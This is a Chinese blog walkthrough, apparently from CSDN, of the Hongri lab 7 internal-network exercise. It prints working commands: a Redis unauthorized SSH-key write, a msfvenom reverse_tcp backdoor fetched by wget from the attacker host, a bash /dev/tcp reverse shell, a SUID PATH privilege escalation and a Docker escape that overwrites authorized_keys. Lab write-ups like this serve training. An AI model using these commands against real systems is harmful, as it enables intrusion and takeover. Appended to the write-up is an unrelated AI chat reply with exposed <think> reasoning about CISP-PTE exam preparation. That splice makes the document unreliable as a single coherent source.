内网攻防-红日靶机7

网络拓扑
在这里插入图片描述

  • 扫描目标端口
    在这里插入图片描述

  • 开放80、81两个站点
    在这里插入图片描述

根据81站点右下角 Laravel v8.29.0 寻找爆出的漏洞
在这里插入图片描述
利用网上公开的EXP成功写入后门并连接。利用后门尝试反弹shell,MSF接不到shell????查看主机配置,哦~,监听本地81端口,然后转发到192.168.52.20的8000端口。(要不是靶场,还真不清楚咋回事)
在这里插入图片描述
原来访问的是这个,怪不得不能将shell反弹到Kali
在这里插入图片描述

  • 回头看看开放的6379,呦~
    在这里插入图片描述

  • 写密钥

    ssh-keygen -t rsa						#生成密钥
    (echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > 1.txt		#将公钥信息写入1.txt#
    cat 1.txt | redis-cli -h 192.168.0.103 -x set hello						#把1.txt文件内容写入目标主机redis的缓冲中
    redis-cli -h 192.168.0.103
    config set dir /root/.ssh          		#设置redis的备份路径为/root/.ssh/
    config set dbfilename authorized_keys	#设置保存文件名为authorized_keys
    save
    
  • ssh root@192.168.0.103连接成功,查看当前IP

    在这里插入图片描述

  • MSF生成后门文件

    msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.0.104 lport=6666 -f elf -o msf.elf
    

    在这里插入图片描述

  • Python起一个HTTP服务
    在这里插入图片描述

  • 下载生成的后门wget http://192.168.0.104:9090/msf.elf MSF启动监听

    在这里插入图片描述

  • 下一步获取目标主机的网络信息

    在这里插入图片描述

  • 扫描目标网段存活了那些IP,一个没扫到。。。。。。。。多半是防火墙拦了

    在这里插入图片描述

  • 回头查看利用Laravel(CVE-2021-3129)web漏洞 写入的后门,发现当前权限过低需要提权,查看有无 通过环境变量提权的可能性

    find / -user root -perm -4000 -print 2>/dev/null
    

    在这里插入图片描述

  • 查看执行shell文件是什么情况,发现与ps命令相似

    在这里插入图片描述

  • 使用环境变量配合SUID进行提权,环境变量添加失败,网上说需要反弹shell,使用后门连接的情况下确实有问题

    在这里插入图片描述

  • 因为无法将shell直接反弹到kali,所以将shell反弹到52.10上

    nc -lvp 1234	#利用redis未授权写入密钥,然后进行SSH链接,再执行
    bash -c 'exec bash -i >& /dev/tcp/192.168.52.10/1234 0>&1'	#通过webshell执行
    

    在这里插入图片描述

  • 再进行SUID提权

    cp /bin/bash /tmp/ps
    export PATH=/tmp:$PATH
    ./shell
    id
    

    在这里插入图片描述

  • 然后使用root权限下载后门并执行,后门就享有root权限;

  • kali有Ubuntu2的路由,但是Ubuntu2没有kali的路由,所以生成正向连接的后门,kali主动去连接Ubuntu2;

  • 由于Ubuntu1做了代理,实则拿到的webshell为Ubuntu2的,将生成的正向后门通过webshell上传到Ubuntu2
    在这里插入图片描述
    在这里插入图片描述

  • MSF启动监听;webshell执行后门

  • 发现接收不到shell
    在这里插入图片描述

  • 通过webshell查看根目录,发现.dockerenv文件,判断当前处于docker环境
    在这里插入图片描述

  • docker逃逸 - -Ubuntu1生成公钥

    ssh-keygen -f hello		#生成名为hello的公钥文件
    chmod 600 hello
    ls
    cat hello.pub			#将内容复制
    

    在这里插入图片描述

  • docker逃逸

    fdisk -l     		#查看磁盘文件
    ls /dev      		#查看设备文件
    cd /
    mkdir haha			
    mount /dev/sda1 /haha	#将/dev/sda1挂在到/haha目录里
    ls /haha
    

    挂载成功
    在这里插入图片描述

  • docker逃逸 - - 密钥覆盖

    cp -avx /haha/home/ubuntu/.ssh/id_rsa.pub /haha/home/ubuntu/.ssh/authorized_keys	#-avx将权限也一起复制
    echo > /haha/home/ubuntu/.ssh/authorized_keys
    echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQClid+sVn9qavo22Vh1HcHV3i6MclKedlVO1O8jTsFIQbuSJYbcmw6JjB++Twwzz0j0HRFP39ztUtc8DE0Ji+0Fb4opWORynE1TLSI767LOhY9BqFfufGKZEN3qXRZhKLiY67WykEtkSUWvxXXRwHEZneC1cgslPXYx9hdbf5lqwWDJM6+PBFQJ4uyN/BZkLDs7307sBYO90+GAPYeBGBnSkjxLKyr6DNP6eXmfRBB83Y+3F4fJE4gD7kNspvUEl4GyWcg0JrmBusMZb4Iz+0CvtjD1ln7eLhT4hat/7zWn1hoW2FXnvT4bJ1y7GCLczq5lbAsf5AADeOB+o9JEwyc5 root@ubuntu' > /haha/home/ubuntu/.ssh/authorized_keys	#将ssh秘钥写入authorized_keys文件
    
    ssh -i haha ubuntu@192.168.52.20		#使用Ubuntu1的shell连接
    

    在这里插入图片描述

  • 连接成功之后,执行后门文件,如果执行MSF后门文件报错’Segmentation fault (core dumped)'👇,说明机器内存不够用了(淦,这个问题折磨了我3小时23分钟)。后门是重新生成的,端口改为了6789,
    在这里插入图片描述

  • 关闭一些后台以后,再执行后门文件就可以了
    在这里插入图片描述

  • 梅开二度
    在这里插入图片描述

  • Ubuntu1、Ubuntu2已经拿到了,就是没能把第二层网络里的win7扫出来
    先到这吧,第一次捣鼓内网,思路乱,技术菜,请大佬指教

<think>好的,用户之前问过关于CISP-PTE的介绍,现在他们想了解如何备考实操部分。我需要详细分析用户的需求,可能他们正在考虑参加这个考试,或者已经开始准备,但需要具体的实操备考策略。 首先,用户可能已经了解CISP-PTE的基本信息,包括考试结构和内容,但现在更关注实操部分。实操部分对于渗透测试认证来说至关重要,因为它直接检验实际技能。备考策略需要覆盖技术要点、资源推荐、练习方法以及考试技巧。 用户可能缺乏实战经验,或者对如何系统练习感到困惑。他们可能需要具体的步骤,比如如何搭建实验环境,推荐哪些靶场平台,以及如何模拟真实考试环境。此外,用户可能关心时间管理和考试中的应对策略。 我需要整理出备考的步骤,从基础技能到专项训练,再到综合演练。同时要强调漏洞报告的编写,因为这在考试中可能容易被忽视。还要提醒常见陷阱,比如工具依赖和忽略权限提升,这些都是考生容易犯的错误。 资源推荐方面,应该包括常用的靶场平台,比如DVWA、Vulnhub,以及国内的在线实验环境。另外,书籍和社区资源也很重要,帮助用户深入学习。 最后,需要给出备考计划建议,分阶段进行,从基础到实战模拟,确保用户有系统性的准备。还要提醒考试当天的策略,比如时间分配和报告结构,确保他们能在考试中高效发挥。 总结下来,回答需要结构清晰,涵盖技术准备、实战练习、资源推荐、注意事项和备考计划,确保用户能全面准备实操部分,顺利通过考试。</think>备考CISP-PTE的**实操部分**需重点训练渗透测试全流程能力,以下是系统性备考策略: --- ### **一、明确实操考试要求** - **考试形式**:在仿真靶场中对多台靶机进行渗透(通常包括Web应用、系统提权、内网横向移动等环节); - **评分标准**:漏洞发现、利用、提权、报告编写能力; - **时间限制**:通常为4-6小时(需合理分配时间)。 --- ### **二、核心技能训练** #### 1. **基础渗透技能** - **信息收集** - 掌握域名/IP扫描(`nmap`、`masscan`)、目录爆破(`dirsearch`、`gobuster`)、子域名枚举(`subfinder`、`Sublist3r`); - 熟练使用`Burp Suite`拦截和修改HTTP请求。 - **Web漏洞利用** - **OWASP Top 10**漏洞实战: - SQL注入(手工构造Payload,绕过WAF); - 文件上传(绕过黑白名单、.htaccess利用); - 反序列化漏洞(Java/PHP反序列化链构造); - SSRF(利用协议读取内网文件、端口探测); - XXE(读取系统文件、外带数据)。 - **工具链**:`sqlmap`、`XSStrike`、`Commix`辅助验证。 - **系统提权与内网渗透** - Linux/Windows提权:内核漏洞(如Dirty Cow)、服务配置错误(SUID、计划任务); - 内网横向:代理工具(`frp`、`ew`)、密码抓取(`mimikatz`、`LaZagne`)、PTH攻击(Pass the Hash); - 权限维持:后门植入、隐藏账号创建。 #### 2. **漏洞报告编写** - **格式要求**:漏洞描述、复现步骤(截图)、危害分析、修复建议; - **考试评分项**:逻辑清晰、关键步骤完整(如漏洞利用的Payload、提权命令)。 --- ### **三、高效练习方法** #### 1. **靶场实战** - **推荐靶场**: - 基础:DVWA、WebGoat、OWASP Juice Shop; - 进阶:Vulnhub(如Kioptrix系列)、Hack The Box(免费靶机); - 内网渗透:TryHackMe的“内网渗透”路径、国内红日(RedTeam)靶场。 - **练习步骤**: ```markdown 1. 独立完成靶机渗透(禁止直接看Writeup); 2. 记录每一步操作(形成渗透笔记); 3. 针对失败场景复盘(如漏洞利用失败的原因); 4. 限时模拟考试环境(如4小时攻破3台靶机)。 ``` #### 2. **模拟真实考试环境** - 使用虚拟机搭建多层级网络(如DMZ区Web服务器→内网数据库服务器); - 限制工具使用(考试可能禁用Metasploit等自动化工具)。 --- ### **四、资源推荐** 1. **书籍** -Web安全攻防:渗透测试实战指南》(徐焱) - 《内网安全攻防:渗透测试实战》(徐焱、王珩) 2. **在线课程** - 实验楼、i春秋的CISP-PTE专项课程(含靶场) - B站渗透测试实战教程(搜索“CISP-PTE实操”) 3. **社区与工具** - GitHub项目:渗透测试工具集合(如`Pentest-Tools`) - 论坛:先知社区、看雪学院(渗透案例分析) --- ### **五、考试注意事项** 1. **时间分配建议** - 信息收集(20%)→ Web漏洞利用(40%)→ 提权与内网(30%)→ 报告编写(10%)。 2. **常见陷阱** - 过度依赖工具(如直接用`sqlmap`而未理解注入原理); - 忽略权限提升后的敏感文件(如`/etc/passwd`、数据库配置文件); - 未清理攻击痕迹(考试可能扣分)。 --- ### **六、备考计划(参考)** | 阶段 | 时长 | 内容 | |--------|--------|--------------------------------------------| | 基础 | 1个月 | OWASP Top 10漏洞复现、Linux/Windows提权 | | 进阶 | 2个月 | 内网渗透靶场(Vulnhub、HTB) | | 冲刺 | 1个月 | 全流程模拟考试(限时渗透+报告编写) | --- **总结**:CISP-PTE实操备考的核心是**“从靶场到实战”**,需通过大量练习形成肌肉记忆,同时注重漏洞原理理解而非单纯工具使用。建议每日投入2-3小时专项训练,考前集中模拟真实环境。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值